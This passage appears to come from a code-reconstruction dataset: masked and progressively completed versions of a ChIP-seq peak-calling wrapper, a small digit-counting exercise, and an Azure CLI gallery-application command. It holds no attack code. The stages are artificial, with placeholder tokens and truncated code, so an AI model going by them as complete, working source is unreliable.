add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport subprocess\nimport collections\nfrom cgatcore import experiment as E\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-5": "'''\nrunSPP.py - wrap spp peak caller\n========================================\n\n:Tags: Python\n\nPurpose\n-------\n\nRuns the spp peak caller.\n\nThe workflow follows the tutorial at:\n\nhttp://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html\n\nUsage\n-----\n\nDocumentation\n-------------\n\nRequirements:\n\n* spp >= ?\n* snow >= 0.3.13\n* bedtools >= 2.21.0\n\nCode\n----\n\n'''\n\nimport os\nimport sys\nimport subprocess\nimport collections\n\nfrom cgatcore import experiment as E\n\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n '''convert bam to bed with bedtools.'''\n\n statement = \"bamToBed -i %(infile)s > %(outfile)s\" % locals()\n\n E.debug(\"executing statement '%s'\" % statement)\n\n retcode = subprocess.call(statement,\n cwd=os.getcwd(),\n shell=True)\n if retcode < 0:\n raise OSError(\"Child was terminated by signal %i: \\n%s\\n\" %\n (-retcode, statement))\n\n return outfile\n\nSPPPeak = collections.namedtuple(\n \"SPPPeak\",\n \"contig unrefined_start unrefined_end strand \"\n \"posterior summit height refined_start refined_end median fdr\")\n\n\ndef iteratePeaks(infile):\n '''iterate of zinba peaks in infile.'''\n\n for line in infile:\n\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"PEAKID\\tChrom\"):\n continue\n # skip empty lines\n if line.startswith(\"\\n\"):\n continue\n\n data = line[:-1].split(\"\\t\")\n\n if len(data) != 12:\n raise ValueError(\"could not parse line %s\" % line)\n\n # I assume these are 1-based coordinates\n data[2] = max(int(data[2]) - 1, 0)\n # end\n data[3] = int(data[3])\n # posterior\n data[5] = float(data[5])\n # summit\n data[6] = max(int(data[6]) - 1, 0)\n # height\n data[7] = int(data[7])\n # refined_start\n data[8] = max(int(data[8]) - 1, 0)\n # end\n data[9] = int(data[9])\n # median\n data[10] = int(data[10])\n # qvalue\n data[11] = float(data[11])\n\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n\n if not argv:\n argv = sys.argv\n\n # setup command line parser\n parser = E.OptionParser(version=\"%prog version: $Id$\",\n usage=globals()[\"__doc__\"])\n\n parser.add_option(\"-f\", \"--input-format\", dest=\"input_format\",\n type=\"choice\",\n choices=(\"bam\",),\n help=\"input file format [default=%default].\")\n\n parser.add_option(\"-w\", \"--window-size\", dest=\"window_size\", type=\"int\",\n help=\"window size [default=%default].\")\n\n parser.add_option(\"-c\", \"--control-filename\",\n dest=\"control_filename\",\n type=\"string\",\n help=\"filename of input/control data in \"\n \"bed format [default=%default].\")\n\n parser.add_option(\"-t\", \"--threads\", dest=\"threads\", type=\"int\",\n help=\"number of threads to use [default=%default].\")\n\n parser.add_option(\"-q\", \"--fdr-threshold\",\n dest=\"fdr_threshold\", type=\"float\",\n help=\"fdr threshold [default=%default].\")\n\n parser.add_option(\"-z\", \"--spp-z-threshold\", dest=\"z_threshold\", type=\"float\",\n help=\"z threshold [default=%default].\")\n\n parser.add_option(\"--bin\", dest=\"bin\", type=\"int\",\n help=\"bin tags within the specified number \"\n \" of basepairs to speed up calculation;\"\n \" increasing bin size decreases the accuracy \"\n \"of the determined parameters [default=%default]\")\n\n parser.add_option(\"--spp-srange-min\", dest=\"srange_min\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.add_option(\"--spp-srange-max\", dest=\"srange_max\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.set_defaults(\n input_format=\"bam\",\n threads=1,\n fdr_threshold=0.05,\n window_size=1000,\n offset=125,\n srange_min=50,\n srange_max=500,\n bin=5,\n z_threshold=3,\n )\n\n # add common options (-h/--help, ...) and parse command line\n (options, args) = E.start(parser, argv=argv)\n\n if len(args) != 2:\n raise ValueError(\n \"please specify a filename with sample data and an output file\")\n\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n\n # load Zinba\n R.library('spp')\n R.library('snow')\n\n # read data\n E.info(\"reading data\")\n R('''chip.data <- read.bam.tags('%s')''' % filename_sample)\n R('''input.data <- read.bam.tags('%s')''' % filename_control)\n R('''cluster = makeCluster( %i )''' % (options.threads))\n\n E.info(\"computing binding characteristics\")\n # get binding info from cross-correlation profile\n\n # srange gives the possible range for the size of the protected region;\n # srange should be higher than tag length; making the upper boundary too\n # high will increase calculation time\n\n # bin - bin tags within the specified number of basepairs to speed\n # up calculation; increasing bin size decreases the accuracy of\n # the determined parameters\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R('''binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);''' % locals())\n # print out binding peak separation distance\n options.stdout.write(\n \"shift\\t%i\\n\" % R('''binding.characteristics$peak$x''')[0])\n\n ##################################################\n ##################################################\n ##################################################\n E.info(\"plot cross correlation profile\")\n # plot cross-correlation profile\n R('''pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)''' %\n filename_output)\n R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')\n R('''plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");''')\n R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')\n R('''dev.off();''')\n\n E.info(\"selecting informative tags based on the binding characteristics\")\n # select informative tags based on the binding characteristics\n R('''chip.data <- select.informative.tags(\n chip.data,binding.characteristics);''')\n R('''input.data <- select.informative.tags(\n input.data,binding.characteristics);''')\n\n E.info(\"outputting broad peaks\")\n window_size, z_threshold = options.window_size, options.z_threshold\n R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))''' % locals())\n # write out in broadPeak format\n R('''write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")''' %\n filename_output)\n\n # binding detection parameters desired FDR (1%). Alternatively, an\n # E-value can be supplied to the method calls below instead of the\n # fdr parameter the binding.characteristics contains the optimized\n # half-size for binding detection window\n R('''detection.window.halfsize <- binding.characteristics$whs;''')\n\n # determine binding positions using wtd method\n E.info(\"determining binding positions using wtd method\")\n fdr = options.fdr_threshold\n R('''bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())\n options.stdout.write(\"detected_peaks\\t%i\\n\" % R(\n '''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])\n\n # output detected binding positions\n R('''output.binding.results(bp,\"%s.summit.txt\");''' % filename_output)\n\n R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())\n # output using narrowPeak format\n R('''write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")''' %\n filename_output)\n\n # write footer and output benchmark information.\n E.stop()\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10): # 9를 입력해서 첨에 틀림 !
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
|
normal
|
{
"blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876",
"index": 4633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = 'MgmtClient'
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=
False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'
, **self.url_parameters)
@property
def method(self):
return 'GET'
@property
def error_format(self):
return 'ODataV4Format'
@property
def url_parameters(self):
parameters = {**self.serialize_url_param(
'galleryApplicationName', self.ctx.args.
gallery_application_name, required=True), **self.
serialize_url_param('galleryApplicationVersionName', self.
ctx.args.gallery_application_version_name, required=True),
**self.serialize_url_param('galleryName', self.ctx.args.
gallery_name, required=True), **self.serialize_url_param(
'resourceGroupName', self.ctx.args.resource_group, required
=True), **self.serialize_url_param('subscriptionId', self.
ctx.subscription_id, required=True)}
return parameters
@property
def query_parameters(self):
parameters = {**self.serialize_query_param('$expand', self.ctx.
args.expand), **self.serialize_query_param('api-version',
'2022-01-03', required=True)}
return parameters
@property
def header_parameters(self):
parameters = {**self.serialize_header_param('Accept',
'application/json')}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var('instance', data, schema_builder=self.
_build_schema_on_200)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(flags={'read_only': True})
_schema_on_200.location = AAZStrType(flags={'required': True})
_schema_on_200.name = AAZStrType(flags={'read_only': True})
_schema_on_200.properties = AAZObjectType(flags={
'client_flatten': True})
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(flags={'read_only': True})
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(serialized_name=
'provisioningState', flags={'read_only': True})
properties.publishing_profile = AAZObjectType(serialized_name=
'publishingProfile', flags={'required': True})
properties.replication_status = AAZObjectType(serialized_name=
'replicationStatus')
publishing_profile = (cls._schema_on_200.properties.
publishing_profile)
publishing_profile.advanced_settings = AAZDictType(serialized_name
='advancedSettings')
publishing_profile.enable_health_check = AAZBoolType(
serialized_name='enableHealthCheck')
publishing_profile.end_of_life_date = AAZStrType(serialized_name
='endOfLifeDate')
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name='excludeFromLatest')
publishing_profile.manage_actions = AAZObjectType(serialized_name
='manageActions')
publishing_profile.published_date = AAZStrType(serialized_name=
'publishedDate', flags={'read_only': True})
publishing_profile.replica_count = AAZIntType(serialized_name=
'replicaCount')
publishing_profile.replication_mode = AAZStrType(serialized_name
='replicationMode')
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(flags={'required': True})
publishing_profile.storage_account_type = AAZStrType(
serialized_name='storageAccountType')
publishing_profile.target_extended_locations = AAZListType(
serialized_name='targetExtendedLocations')
publishing_profile.target_regions = AAZListType(serialized_name
='targetRegions')
advanced_settings = (cls._schema_on_200.properties.
publishing_profile.advanced_settings)
advanced_settings.Element = AAZStrType()
manage_actions = (cls._schema_on_200.properties.
publishing_profile.manage_actions)
manage_actions.install = AAZStrType(flags={'required': True})
manage_actions.remove = AAZStrType(flags={'required': True})
manage_actions.update = AAZStrType()
settings = (cls._schema_on_200.properties.publishing_profile.
settings)
settings.config_file_name = AAZStrType(serialized_name=
'configFileName')
settings.package_file_name = AAZStrType(serialized_name=
'packageFileName')
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(serialized_name=
'defaultConfigurationLink')
source.media_link = AAZStrType(serialized_name='mediaLink',
flags={'required': True})
target_extended_locations = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations)
target_extended_locations.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_extended_locations.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.extended_location = AAZObjectType(serialized_name=
'extendedLocation')
_element.extended_location_replica_count = AAZIntType(
serialized_name='extendedLocationReplicaCount')
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
extended_location = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations.Element.
extended_location)
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = (cls._schema_on_200.properties.
publishing_profile.target_regions)
target_regions.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_regions.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.name = AAZStrType(flags={'required': True})
_element.regional_replica_count = AAZIntType(serialized_name=
'regionalReplicaCount')
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
replication_status = (cls._schema_on_200.properties.
replication_status)
replication_status.aggregated_state = AAZStrType(serialized_name
='aggregatedState', flags={'read_only': True})
replication_status.summary = AAZListType(flags={'read_only': True})
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.replication_status.
summary.Element)
_element.details = AAZStrType(flags={'read_only': True})
_element.progress = AAZIntType(flags={'read_only': True})
_element.region = AAZStrType(flags={'read_only': True})
_element.state = AAZStrType(flags={'read_only': True})
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_encryption_images_read = None
@classmethod
def _build_schema_encryption_images_read(cls, _schema):
if cls._schema_encryption_images_read is not None:
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
return
(cls._schema_encryption_images_read) = (_schema_encryption_images_read
) = AAZObjectType()
encryption_images_read = _schema_encryption_images_read
encryption_images_read.data_disk_images = AAZListType(serialized_name
='dataDiskImages')
encryption_images_read.os_disk_image = AAZObjectType(serialized_name
='osDiskImage')
data_disk_images = _schema_encryption_images_read.data_disk_images
data_disk_images.Element = AAZObjectType()
_element = _schema_encryption_images_read.data_disk_images.Element
_element.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
_element.lun = AAZIntType(flags={'required': True})
os_disk_image = _schema_encryption_images_read.os_disk_image
os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
os_disk_image.security_profile = AAZObjectType(serialized_name=
'securityProfile')
security_profile = (_schema_encryption_images_read.os_disk_image.
security_profile)
security_profile.confidential_vm_encryption_type = AAZStrType(
serialized_name='confidentialVMEncryptionType')
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
serialized_name='secureVMDiskEncryptionSetId')
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.GalleryApplicationVersionsGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = 'MgmtClient'
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=
False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'
, **self.url_parameters)
@property
def method(self):
return 'GET'
@property
def error_format(self):
return 'ODataV4Format'
@property
def url_parameters(self):
parameters = {**self.serialize_url_param(
'galleryApplicationName', self.ctx.args.
gallery_application_name, required=True), **self.
serialize_url_param('galleryApplicationVersionName', self.
ctx.args.gallery_application_version_name, required=True),
**self.serialize_url_param('galleryName', self.ctx.args.
gallery_name, required=True), **self.serialize_url_param(
'resourceGroupName', self.ctx.args.resource_group, required
=True), **self.serialize_url_param('subscriptionId', self.
ctx.subscription_id, required=True)}
return parameters
@property
def query_parameters(self):
parameters = {**self.serialize_query_param('$expand', self.ctx.
args.expand), **self.serialize_query_param('api-version',
'2022-01-03', required=True)}
return parameters
@property
def header_parameters(self):
parameters = {**self.serialize_header_param('Accept',
'application/json')}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var('instance', data, schema_builder=self.
_build_schema_on_200)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(flags={'read_only': True})
_schema_on_200.location = AAZStrType(flags={'required': True})
_schema_on_200.name = AAZStrType(flags={'read_only': True})
_schema_on_200.properties = AAZObjectType(flags={
'client_flatten': True})
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(flags={'read_only': True})
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(serialized_name=
'provisioningState', flags={'read_only': True})
properties.publishing_profile = AAZObjectType(serialized_name=
'publishingProfile', flags={'required': True})
properties.replication_status = AAZObjectType(serialized_name=
'replicationStatus')
publishing_profile = (cls._schema_on_200.properties.
publishing_profile)
publishing_profile.advanced_settings = AAZDictType(serialized_name
='advancedSettings')
publishing_profile.enable_health_check = AAZBoolType(
serialized_name='enableHealthCheck')
publishing_profile.end_of_life_date = AAZStrType(serialized_name
='endOfLifeDate')
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name='excludeFromLatest')
publishing_profile.manage_actions = AAZObjectType(serialized_name
='manageActions')
publishing_profile.published_date = AAZStrType(serialized_name=
'publishedDate', flags={'read_only': True})
publishing_profile.replica_count = AAZIntType(serialized_name=
'replicaCount')
publishing_profile.replication_mode = AAZStrType(serialized_name
='replicationMode')
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(flags={'required': True})
publishing_profile.storage_account_type = AAZStrType(
serialized_name='storageAccountType')
publishing_profile.target_extended_locations = AAZListType(
serialized_name='targetExtendedLocations')
publishing_profile.target_regions = AAZListType(serialized_name
='targetRegions')
advanced_settings = (cls._schema_on_200.properties.
publishing_profile.advanced_settings)
advanced_settings.Element = AAZStrType()
manage_actions = (cls._schema_on_200.properties.
publishing_profile.manage_actions)
manage_actions.install = AAZStrType(flags={'required': True})
manage_actions.remove = AAZStrType(flags={'required': True})
manage_actions.update = AAZStrType()
settings = (cls._schema_on_200.properties.publishing_profile.
settings)
settings.config_file_name = AAZStrType(serialized_name=
'configFileName')
settings.package_file_name = AAZStrType(serialized_name=
'packageFileName')
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(serialized_name=
'defaultConfigurationLink')
source.media_link = AAZStrType(serialized_name='mediaLink',
flags={'required': True})
target_extended_locations = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations)
target_extended_locations.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_extended_locations.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.extended_location = AAZObjectType(serialized_name=
'extendedLocation')
_element.extended_location_replica_count = AAZIntType(
serialized_name='extendedLocationReplicaCount')
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
extended_location = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations.Element.
extended_location)
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = (cls._schema_on_200.properties.
publishing_profile.target_regions)
target_regions.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_regions.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.name = AAZStrType(flags={'required': True})
_element.regional_replica_count = AAZIntType(serialized_name=
'regionalReplicaCount')
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
replication_status = (cls._schema_on_200.properties.
replication_status)
replication_status.aggregated_state = AAZStrType(serialized_name
='aggregatedState', flags={'read_only': True})
replication_status.summary = AAZListType(flags={'read_only': True})
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.replication_status.
summary.Element)
_element.details = AAZStrType(flags={'read_only': True})
_element.progress = AAZIntType(flags={'read_only': True})
_element.region = AAZStrType(flags={'read_only': True})
_element.state = AAZStrType(flags={'read_only': True})
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_encryption_images_read = None
@classmethod
def _build_schema_encryption_images_read(cls, _schema):
if cls._schema_encryption_images_read is not None:
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
return
(cls._schema_encryption_images_read) = (_schema_encryption_images_read
) = AAZObjectType()
encryption_images_read = _schema_encryption_images_read
encryption_images_read.data_disk_images = AAZListType(serialized_name
='dataDiskImages')
encryption_images_read.os_disk_image = AAZObjectType(serialized_name
='osDiskImage')
data_disk_images = _schema_encryption_images_read.data_disk_images
data_disk_images.Element = AAZObjectType()
_element = _schema_encryption_images_read.data_disk_images.Element
_element.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
_element.lun = AAZIntType(flags={'required': True})
os_disk_image = _schema_encryption_images_read.os_disk_image
os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
os_disk_image.security_profile = AAZObjectType(serialized_name=
'securityProfile')
security_profile = (_schema_encryption_images_read.os_disk_image.
security_profile)
security_profile.confidential_vm_encryption_type = AAZStrType(
serialized_name='confidentialVMEncryptionType')
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
